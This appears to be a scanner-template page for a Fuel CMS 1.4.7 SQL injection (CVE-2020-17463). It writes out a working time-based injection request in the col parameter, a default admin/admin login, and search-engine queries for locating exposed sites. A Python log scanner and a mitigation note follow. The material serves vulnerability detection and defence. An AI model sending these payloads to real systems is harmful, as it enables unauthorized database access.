Fuel CMS 1.4.7 - SQL Injection
ID: CVE-2020-17463
Severity: critical
Author: Thirukrishnan
Tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
Description
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
YAML Source

```yaml
id: CVE-2020-17463

info:
  name: Fuel CMS 1.4.7 - SQL Injection
  author: Thirukrishnan
  severity: critical
  description: |
    FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: Fixed in version 115
  reference:
    - https://www.exploit-db.com/exploits/48741
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17463
    - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
    - https://getfuelcms.com/
    - https://cwe.mitre.org/data/definitions/89.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17463
    cwe-id: CWE-89
    epss-score: 0.94399
    epss-percentile: 0.99154
    cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: thedaylightstudio
    product: fuel_cms
    shodan-query: http.title:"fuel cms"
    fofa-query: title="fuel cms"
    google-query: intitle:"fuel cms"
  tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio

http:
  - raw:
      - |
        GET /fuel/login/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /fuel/login/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}

        user_name={{username}}&password={{password}}&Login=Login&forward=
      - |
        @timeout: 10s
        GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_3 == 200'
          - 'contains(body_1, "FUEL CMS")'
        condition: and
# digest: 4a0a0047304502205d46eea9079112ab4d7a573b4e658911e245f87b587362e10b96aff39d0a6299022100b0c69acc893decd0afe47119ef5606f303ced940c0042b396149851b1520f4df:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17463.yaml"
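
A defensive counterpart to the template's third request, as an added example that is not part of the original template or the Fuel CMS project: a Python scan of web-server access logs for requests to the three affected endpoints whose col value is not a plain column name. The combined log format, the identifier-only rule for col, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the CVE description (served under /fuel/ in the template).
ENDPOINTS = ("/pages/items", "/permissions/items", "/navigation/items")
# Assumption: a legitimate sort column is a plain, optionally table-qualified, identifier.
SAFE_COL = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_col(line):
    """Return the decoded col value if the line hits an affected endpoint
    with a col parameter that is not a plain column name, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.rstrip("/").endswith(ENDPOINTS):
        return None
    # parse_qs URL-decodes values, so encoded separators are seen in clear.
    for value in parse_qs(url.query).get("col", []):
        if value and not SAFE_COL.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, col_value) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_col(line)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /fuel/pages/items/?limit=50&order=asc&col=location&fuel_inline=0 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /fuel/pages/items/?limit=50&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /fuel/navigation/items/?col=nav_key%2C1 HTTP/1.1" 200 300',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /blog/?col=a+b HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious col={value!r}")
```

The same identifier-only check, applied server-side before the value reaches the ORDER BY clause, is the usual mitigation for sort-column injection on installations that cannot be upgraded immediately.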